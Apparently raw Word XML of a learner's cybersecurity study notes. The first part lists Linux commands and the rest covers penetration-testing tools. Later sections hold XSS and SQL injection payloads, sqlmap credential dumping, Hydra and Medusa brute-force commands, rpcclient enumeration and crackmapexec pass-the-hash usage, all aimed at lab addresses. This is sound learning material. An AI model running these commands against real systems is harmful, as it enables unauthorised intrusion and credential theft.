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9B8DB" w14:textId="49EB5E89" w:rsidR="00D841C6" w:rsidRPr="00AD7813" w:rsidRDefault="00AD7813" w:rsidP="003467DE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5"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pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5"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 xml:space="preserve">Main </w:t>
      </w:r>
      <w:r w:rsidR="003467DE" w:rsidRPr="00AD7813">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F9ED5"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Cyber Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0084EF" w14:textId="1153F28D" w:rsidR="00772D97" w:rsidRDefault="00772D97" w:rsidP="00772D9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A9517" w14:textId="7F463C75" w:rsidR="00A716BA" w:rsidRPr="00A716BA" w:rsidRDefault="00A716BA" w:rsidP="00A716BA">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAD70C" w14:textId="43CCB13C" w:rsidR="00613EAF" w:rsidRDefault="00786159" w:rsidP="0069419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 shows files and directories in my current location</w:t>
      </w:r>
      <w:r w:rsidR="0069419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A0D7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-a – shows directories and hidden files</w:t>
      </w:r>
      <w:r w:rsidR="0069419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035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ls -l – shows info on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E035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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E035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files like size</w:t>
      </w:r>
      <w:r w:rsidR="008035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E035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r w:rsidR="0080350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E035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permissions</w:t>
      </w:r>
      <w:r w:rsidR="0069419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13E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-R – show recursively all the directories from my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F316D" w14:textId="20612B9E" w:rsidR="003B35C9" w:rsidRDefault="00F954CE" w:rsidP="003B35C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locate rockyou.txt – print all the passes of files that contain the name rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="003B3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B35C9" w:rsidRPr="003B3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find / -name rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidR="003B3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for rockyou.txt file and shows the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21202C4F" w14:textId="61DCD294" w:rsidR="00772D97" w:rsidRDefault="00772D97"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 means super user do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE4388" w14:textId="752DD522" w:rsidR="00B31BEF" w:rsidRDefault="00B31BEF" w:rsidP="003467DE">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kali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switch user</w:t>
      </w:r>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kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576E38F" w14:textId="5C12A380" w:rsidR="00E0359F" w:rsidRPr="00E0359F" w:rsidRDefault="00E0359F"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pwd</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shows my current location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102059D" w14:textId="3503EDAF" w:rsidR="000A0D7F" w:rsidRDefault="000A0D7F" w:rsidP="0022779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 - go to the first directory</w:t>
      </w:r>
      <w:r w:rsidR="0022779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 – go one directory back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32002FB3" w14:textId="0AFAC90C" w:rsidR="000A0D7F" w:rsidRDefault="00605A20" w:rsidP="003467D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nano asd.txt – edit a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30079D1E" w14:textId="667621AC" w:rsidR="00605A20" w:rsidRDefault="00605A2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  asd.txt</w:t>
      </w:r>
      <w:r w:rsidR="00406B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print a file content</w:t>
      </w:r>
      <w:r w:rsidR="00406B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cat *.txt – enter all the text files</w:t>
      </w:r>
      <w:r w:rsidR="002D2B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cat -n f27 – print the file content and sign each line with its number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B68005" w14:textId="4E8D6836" w:rsidR="00EC2FA6" w:rsidRDefault="00EC2FA6"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awk ‘{print $3}’ – print the third column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‘{print $NF}’ – print the last column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‘{print$(NF -1)}’ – print the second line from the end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‘{print $1, $2, $3}’ – print the first 3 lines</w:t>
      </w:r>
      <w:r w:rsidR="00DD7D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-F@ ‘{print $2}’ – separate all the lines where found @ and print the second column from all the columns.</w:t>
      </w:r>
      <w:r w:rsidR="00DD7D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‘length &gt; 7’ – prints all the lines that have more than 7 chars</w:t>
      </w:r>
      <w:r w:rsidR="008D40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awk ‘NR == 111’ – print the line 111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6A24F" w14:textId="5FAD9DD4" w:rsidR="00074A8B" w:rsidRDefault="00074A8B" w:rsidP="00A71BB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  -30 – prints the first 30 lines (the default is 10)</w:t>
      </w:r>
      <w:r w:rsidR="00A71B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tail – print the last 10 lines</w:t>
      </w:r>
      <w:r w:rsidR="00A71B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head -97 | tail -1 – print line number 97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B98864" w14:textId="27FF0391" w:rsidR="00074A8B" w:rsidRDefault="00074A8B"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 ‘s/r/x/g’ – switch the char r in x in globally.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sort – sort the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ouput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identical words and number will shows together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delete </w:t>
      </w:r>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adjacent words, that’s why have to come after sort</w:t>
      </w:r>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 delete adjacent words and count how many duplicates</w:t>
      </w:r>
      <w:r w:rsidR="009529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9529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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009529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529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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009529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delete adjacent words and count how many duplicates and ignore case sensitive</w:t>
      </w:r>
      <w:r w:rsidR="00D37B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sort -n – sort by number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D3FCD3" w14:textId="47CE1263" w:rsidR="008D404F" w:rsidRDefault="008D404F"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wc</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 – count number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wc</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-m/c – count number of chars or bytes, which is the same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wc</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 – counts the number of words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785BE66" w14:textId="1BA5F68C" w:rsidR="00D37B8F" w:rsidRPr="00074A8B" w:rsidRDefault="00D37B8F"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 ‘a-z’ ‘A-Z’ – replacing all the chars a-z in A-Z</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tr ‘\t’ ‘\n’ – instead of tab go down a line </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF428D" w14:textId="77777777"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 prints the current date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD8DECF" w14:textId="77777777"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Ifconfig</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prints the network configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677AF15F" w14:textId="07BF9F1C" w:rsidR="00806014" w:rsidRDefault="00806014"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 – clear the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C64AD" w14:textId="0E58ECEA"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Mkdir</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ddwd</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creating a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directoy</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called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ddwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="367AC794" w14:textId="0B1843D8" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="006D49FC">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Whoami</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prints the current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2CD889" w14:textId="1A1926A2" w:rsidR="00605A20" w:rsidRDefault="002F4F3E" w:rsidP="002F4F3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rm -f – remove a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rm -d – remove empty directory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05A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rm -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00605A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proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00605A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05A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dddd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00605A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remove 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empty</w:t>
      </w:r>
      <w:r w:rsidR="00605A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directory ( r stands for recursive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7DDE8" w14:textId="77777777" w:rsidR="00605A20" w:rsidRDefault="00605A2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 /home/kali/flag.txt /home/kali/Desktop – move the file from the first path to the other</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6BE00" w14:textId="6E53D848" w:rsidR="00605A20" w:rsidRDefault="00605A2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 /home/kali/flag.txt /home/kali/Desktop – copy the file from the first path and paste in the other path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04E50F" w14:textId="526F745B" w:rsidR="009163B0" w:rsidRDefault="009163B0"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uptime – output the amount of time and users logged since the last boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B670C8" w14:textId="2D29ECB3" w:rsidR="006D49FC" w:rsidRDefault="006D49FC"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passwd kali</w:t>
      </w:r>
      <w:r w:rsidR="00B215E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change password for the user kali</w:t>
      </w:r>
      <w:r w:rsidR="00B215E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p>
    <w:p w14:paraId="5638866A" w14:textId="5D903E97" w:rsidR="005855F8" w:rsidRDefault="005855F8" w:rsidP="00605A2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apt-get update – update the packages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apt-get upgrade – upgrade the packages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sudo apt-get install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cmatrix</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install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cmatrix</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package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ACB66F" w14:textId="61DBC323" w:rsidR="006D49FC" w:rsidRDefault="006D49FC" w:rsidP="00A716B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chmod – change mode, change the permissions setting of a file.</w:t>
      </w:r>
      <w:r w:rsidR="00A716B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chmod +x file.sh – change the file permissions so we could run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AEF49" w14:textId="3A63E2A4" w:rsidR="00372529" w:rsidRDefault="00605A20" w:rsidP="00C11F4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"hello" – prints “hello”</w:t>
      </w:r>
      <w:r w:rsidR="001368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echo “hello” &gt;&gt; file.txt – add the text in the file, if the file </w:t>
      </w:r>
      <w:r w:rsidR="001A42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 exist</w:t>
      </w:r>
      <w:r w:rsidR="001368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creates it</w:t>
      </w:r>
      <w:r w:rsidR="001368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echo “hello” &gt; file.txt - put the text in the file, if the file exist, it override it</w:t>
      </w:r>
      <w:r w:rsid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11F4F" w:rsidRP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-e 'hello\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C11F4F" w:rsidRP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nhello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C11F4F" w:rsidRP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go down a line</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72529"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echo -e </w:t>
      </w:r>
      <w:r w:rsidR="000567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2529"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\033[1mexiting...\033[0m</w:t>
      </w:r>
      <w:r w:rsidR="000567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72529"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bold the text</w:t>
      </w:r>
      <w:r w:rsidR="00CA2A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echo -e </w:t>
      </w:r>
      <w:r w:rsidR="0005677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\033[31mexiting...\033[0m</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red text</w:t>
      </w:r>
      <w:r w:rsidR="00C11F4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 – go down a line</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664C2"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\033[1m</w:t>
      </w:r>
      <w:r w:rsidR="00A664C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Start bold text</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\033[31m</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start red text</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C0698" w:rsidRPr="0037252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\033[0m</w:t>
      </w:r>
      <w:r w:rsid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6C0698" w:rsidRPr="006C06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 the text formatting to the terminal's default settings</w:t>
      </w:r>
      <w:r w:rsidR="00B839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CB85727" w14:textId="7EF6AC6B" w:rsidR="006C60E7" w:rsidRPr="00361DDD" w:rsidRDefault="006C60E7" w:rsidP="00361DD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figlet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my project” – command to print</w:t>
      </w:r>
      <w:r w:rsidR="00B839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large text for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titles</w:t>
      </w:r>
      <w:r w:rsidR="00361D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361DDD" w:rsidRPr="00361D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figlet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00361DDD" w:rsidRPr="00361D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 slant "Forensic investigation"</w:t>
      </w:r>
      <w:r w:rsidR="00361D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 the headline in slant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6295BD4F" w14:textId="32FA77E5" w:rsidR="00136837" w:rsidRPr="00372529" w:rsidRDefault="00136837"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090E4F" w14:textId="1076D514" w:rsidR="00882BF3" w:rsidRDefault="00882BF3"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md5sum file.txt – calculate the md5 hash of the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sha1sum file.txt – calculate the sha1 hash of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764EB51" w14:textId="77777777" w:rsidR="00502E69" w:rsidRDefault="00502E69" w:rsidP="00502E6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service ssh start/stop/status – for start stop or check the status of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A44AE2" w14:textId="77777777" w:rsidR="00502E69" w:rsidRDefault="00502E69" w:rsidP="00502E6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Wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="008D369C">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downloads the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD9191" w14:textId="35F11E55" w:rsidR="00461CCA" w:rsidRDefault="00461CCA" w:rsidP="00502E6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clone http://github.com....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03433891" w14:textId="07F1201E" w:rsidR="00406BD8" w:rsidRDefault="00502E69" w:rsidP="00406BD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Curl – a command line tool that enables exchange between a device and a server through terminal.</w:t>
      </w:r>
      <w:r w:rsidR="00406BD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70284D" w14:textId="68FCD0E3" w:rsidR="009A2FE7" w:rsidRDefault="00502E69" w:rsidP="009A2FE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grep “hello” – search for the word hello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“hello” - search for the word hello without care for case sensitive</w:t>
      </w:r>
      <w:r w:rsidR="0065544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-v</w:t>
      </w:r>
      <w:r w:rsidR="00F218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123456</w:t>
      </w:r>
      <w:r w:rsidR="0065544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exclude </w:t>
      </w:r>
      <w:r w:rsidR="00F218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 word or number that contains 123456</w:t>
      </w:r>
      <w:r w:rsidR="003A5B8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‘\S’ – delete empty lines</w:t>
      </w:r>
      <w:r w:rsidR="006C752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-w “hi” – search only for the word “hi” and not strings that contain “hi”</w:t>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-E ‘^[0-9]+$’</w:t>
      </w:r>
      <w:r w:rsidR="006C752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584C" w:rsidRP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only lines that contain numbers</w:t>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grep -R “hello” – search recursively in all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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files from the current path the word “hello”</w:t>
      </w:r>
      <w:r w:rsidR="00B106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558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0858" w:rsidRPr="00C308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grep -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C30858" w:rsidRPr="00C308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Eo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C30858" w:rsidRPr="00C308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'([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.([0-9]{1,2}|1[0-9]{2}|2[0-4][0-9]|25[0-5])'</w:t>
      </w:r>
      <w:r w:rsidR="00C308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only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C308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00C308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(maybe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C308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sidR="00C308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accurate)</w:t>
      </w:r>
      <w:r w:rsidR="002554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‘password\|pass\|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002554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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002554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*.txt – search for every word here in the files</w:t>
      </w:r>
      <w:r w:rsidR="009A2F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-I zip -B 8 – print 8 lines before the word</w:t>
      </w:r>
      <w:r w:rsidR="009A2F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grep -I zip -A 8 – print 8 lines after the word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBC071" w14:textId="03AC78B5" w:rsidR="00E52D0A" w:rsidRPr="00E52D0A" w:rsidRDefault="00E52D0A" w:rsidP="000D0B2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netstat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r w:rsidR="0005741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netstat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tapn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2161E">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netstat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planetu</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both listening and non-listening sockets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numerical addresses instead of resolving names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only listening sockets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TCP connections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UDP connections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the PID and name of the program to which each socket belongs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1038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extended information, useful for extra details like user IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBC5E6" w14:textId="77777777" w:rsidR="002170DA" w:rsidRDefault="002170DA"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1CEF45" w14:textId="35806355" w:rsidR="002170DA" w:rsidRDefault="002170DA"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-m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http.server</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8000 – open port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D645A9C" w14:textId="3ADFF5FB" w:rsidR="00B150B7" w:rsidRDefault="00C44632" w:rsidP="00B150B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ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="006028B0">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joe@10.10.10.10</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connect using ssh to the machine 10.10.10.10 with joe user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA8D42" w14:textId="1EB1A542" w:rsidR="001D0E2C" w:rsidRDefault="001D0E2C" w:rsidP="00B150B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Sshpass</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‘kali’ ssh -o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StrictHostKeyChecking</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000104DD" w:rsidRPr="00622BB2">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kali@10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>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8.8.8.8” -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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oG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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/home/kali/Desktop/nmap.txt – using the password kali (-p) with user kali, and run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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sidR="000104D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C5ECC6" w14:textId="0E469831" w:rsidR="00B53A54" w:rsidRPr="00987E1B" w:rsidRDefault="00987E1B" w:rsidP="00987E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sshpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ssh_pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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/home/kali/Try.sh "$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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ssh_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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ssh_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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roofErr w:type="spellStart"/>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ssh_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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transfer a file from first machine to the second machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344B838C" w14:textId="76AE6DFA" w:rsidR="00C44632" w:rsidRDefault="00C44632"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 22 – connect port 22 (does not provide security)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lvp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 – listening, verbose, port, listen to port 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA7C86" w14:textId="36E6DAEC" w:rsidR="009D0E12" w:rsidRDefault="009D0E12"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xsltproc</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all_nmap.xml &gt;&gt; nmap.html – convert xml to html (more readable)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firefox</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nmap.html</w:t>
      </w:r>
      <w:r w:rsidR="00800C8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open html file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12609430" w14:textId="06A3ED78" w:rsidR="00980E0E" w:rsidRDefault="00E254BD" w:rsidP="00E254B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t>
      </w:r>
      <w:r w:rsidRPr="00E254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zip -r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t>
      </w:r>
      <w:r w:rsidRPr="00E254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.zip "$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E254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first_location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E254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254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name_of_dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E254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zip all the directories and files in the location provided and call the zip directory hello.zip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80E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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00980E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gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00980E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rockyou.txt.gz – open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00980E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gz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00980E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w:t>
      </w:r>
      <w:r w:rsidR="003D0EA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unzip filename – for open zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17692072" w14:textId="6A521865" w:rsidR="008D1514" w:rsidRDefault="008D1514"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-n “hello” | sha1sum – it will convert the word “hello” to hash in type of sha1sum, the -n is for explicit to not go down for another line, for the hash to be accurate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386DF13" w14:textId="006A64F2" w:rsidR="00647E23" w:rsidRDefault="00647E23"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erel</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echo “hello $name” – “hello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erel</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variables in terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C413D" w14:textId="709FBF46" w:rsidR="00634FC1" w:rsidRDefault="00634FC1" w:rsidP="00634FC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4F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char="${var,,}"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insert the sentence of var variable into char in lower case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7773D222" w14:textId="75E6A8E8" w:rsidR="00C37C9A" w:rsidRDefault="00C37C9A"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file in $(ls); do echo “$file”; sleep 2; done – print the names of the files in the directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110FAC3F" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837"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binwalk</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harddisk.vmdk</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shows us which files inside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binwalk</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harddisk.vmdk</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extract files inside it can to, default directory name determined by the name of the file been carved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053913B" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837"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foremost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harddisk.vmdk</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 output – carve another type of file from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binwalk</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tool, if not specified the name of output, the default name of the directory is “output”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7271E7" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="00B30837"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bulk_extractor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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E6FE5" w:rsidRP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harddisk.vmdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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bulk – has to specify output directory, bulk tool extract a lot of files and sometimes even </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E6F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12781870" w14:textId="77777777" w:rsidR="008A6D1E" w:rsidRDefault="005A3156"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strings </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A315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harddisk.vmdk</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extract strings from the file, helpful with grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115DB823" w14:textId="7E9AC4AD" w:rsidR="00B30837" w:rsidRDefault="00EA6EB0"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exiftool</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file.elf</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extract data on the file such original name and more, it may possible to change this data when loading the file to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HxD</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change there</w:t>
      </w:r>
      <w:r w:rsidR="00CD25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CD25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exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD25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car5.jpg -comment = “car” – add new tag</w:t>
      </w:r>
      <w:r w:rsidR="00CD25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CD25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exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD253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-csv photo.jpg &gt; extracted.csv – save the results to excel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ACA80D" w14:textId="46331C31" w:rsidR="0043317B" w:rsidRDefault="0043317B"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steghide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embed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a.txt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b.txt – cover the file a.txt behind b.txt,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(embedded file),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(cover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steghide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indo</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b.txt – show details on the file, maybe ask for password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steghide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extract -sf b.txt – extract the hidden file behind b.txt, sf (secret file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650ADBCC" w14:textId="51E3B6C5" w:rsidR="00B02F1C" w:rsidRDefault="00B02F1C"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 -jar loader.jar – a command to open the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burpsuite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 to run from the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burpsuite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directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACEACB" w14:textId="6ABF1CED" w:rsidR="00A503FD" w:rsidRDefault="00A503FD" w:rsidP="005832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&lt;script&gt;alert(‘</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xss</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attack’)&lt;/script&gt; - script you can insert into input box of a site to see if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injection works on it</w:t>
      </w:r>
      <w:r w:rsidR="00B369D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used for relational database</w:t>
      </w:r>
      <w:r w:rsidR="00AC0D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&lt;SCRIPT&gt;alert(‘</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xss</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attack’)&lt;/SCRIPT&gt; - maybe they did not filtered big letters</w:t>
      </w:r>
      <w:r w:rsid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832B0" w:rsidRP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 FROM USERS WHERE username=1' OR '1'='1</w:t>
      </w:r>
      <w:r w:rsid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roofErr w:type="spellEnd"/>
      <w:r w:rsidR="005832B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injection for extract all the users (works only if the table of the users called USERS, you can try also with USERNAME)</w:t>
      </w:r>
      <w:r w:rsidR="00A16B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ls – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A16B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roofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A16B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injection</w:t>
      </w:r>
      <w:r w:rsidR="004C174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it also possible to encode special characters and use that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77579631" w14:textId="7D1CA11D" w:rsidR="00810F6C" w:rsidRDefault="00810F6C" w:rsidP="005832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Sqlmap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tool that destined to extract data from DB</w:t>
      </w:r>
      <w:r w:rsidR="000042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0042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sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000042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ddd.txt -D </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000042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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000042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 users –dump – extract users and passwords from users table from DB called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000042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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000042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using the exist file ddd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB0030" w14:textId="603E97B7" w:rsidR="00C4394F" w:rsidRDefault="00C4394F" w:rsidP="005832B0">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Nikto</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 10.10.10.10 – tool for pt in web, could extract data by exploit misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77EF6E" w14:textId="4D8F90C0" w:rsidR="00425FB7" w:rsidRDefault="00425FB7" w:rsidP="005832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Dirb</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Pr="006B41E2">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http://10.10.10.10/multi</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files and directories in this location using brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA0377" w14:textId="4EF149AF" w:rsidR="0036430B" w:rsidRDefault="00FD3637"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Hydra -l kali -p 1234 10.10.10.10 ssh – attack the ssh service on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 with kali user and password 1234, L or P is for list of users or passwords.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hydra -l malware -p 1 rdp://10.10.10.10 – attack the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 with malware user and password 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 for verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007E488" w14:textId="730E94E4" w:rsidR="00697594" w:rsidRDefault="0069759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Medusa -h 10.10.10.10 -u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msfadmin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/home/kali/file.txt -M ftp – use the user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msfadmin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password file to try brute force on ftp service on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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C04DF5" w14:textId="421232FD" w:rsidR="0036430B" w:rsidRDefault="0036430B"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Enum4linux 10.10.10.10 – tool that search info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12217076" w14:textId="376A7EFD" w:rsidR="00601862" w:rsidRDefault="00E45354" w:rsidP="00E4535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535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RPC (Remote Procedure Call)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E204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rpcclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E204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 “” -N 10.10.10.10  - try to connect to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E204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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E204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 with no username and no password, the flag -N means no password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rpcclient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 “pentestme%Passw0rd\!” -c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queryuser</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Administrator” 10.10.10.10 – connect to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 and run the command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queryuser</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Administrator with the credentials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pentestme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user and Passw0rd\! as password, (\ is for the special char ! to be recognized as part of the password), it retrieve info in administrator user.</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queryuser</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Administrator – it retrieve info in administrator user, could include user SID, and the groups </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member in</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enumdomgroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the amount of groups in the system</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enumdomusers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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the amount of users in the system</w:t>
      </w:r>
      <w:r w:rsidR="00CF63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6961B57" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE"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5D8CF3" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE"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1F580" w14:textId="77777777" w:rsidR="00A36FBE" w:rsidRDefault="00A36FBE"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A736D1" w14:textId="3BF24614" w:rsidR="00FA06B9" w:rsidRDefault="00412636" w:rsidP="00726FC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crackmapexec</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used mainly for pt, it’s </w:t>
      </w:r>
      <w:r w:rsidR="00C1032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mainly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post exploitation tool</w:t>
      </w:r>
      <w:r w:rsidR="00C1032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(could use also for exploit)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263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enumerate information about network shares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 use it for run commands and more</w:t>
      </w:r>
      <w:r w:rsidR="00C856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main functions of him is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C856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PtH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C856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 the hash) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C856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PtT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C856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 the ticket)</w:t>
      </w:r>
      <w:r w:rsidR="00726F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605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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003605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crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003605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3605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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003605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10.10.10.10 -u administrator -p 123456 </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6053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credentials are right it will write “(pwn3d!)”</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sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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10.10.10.10 -u administrator -p 123456 --</w:t>
      </w:r>
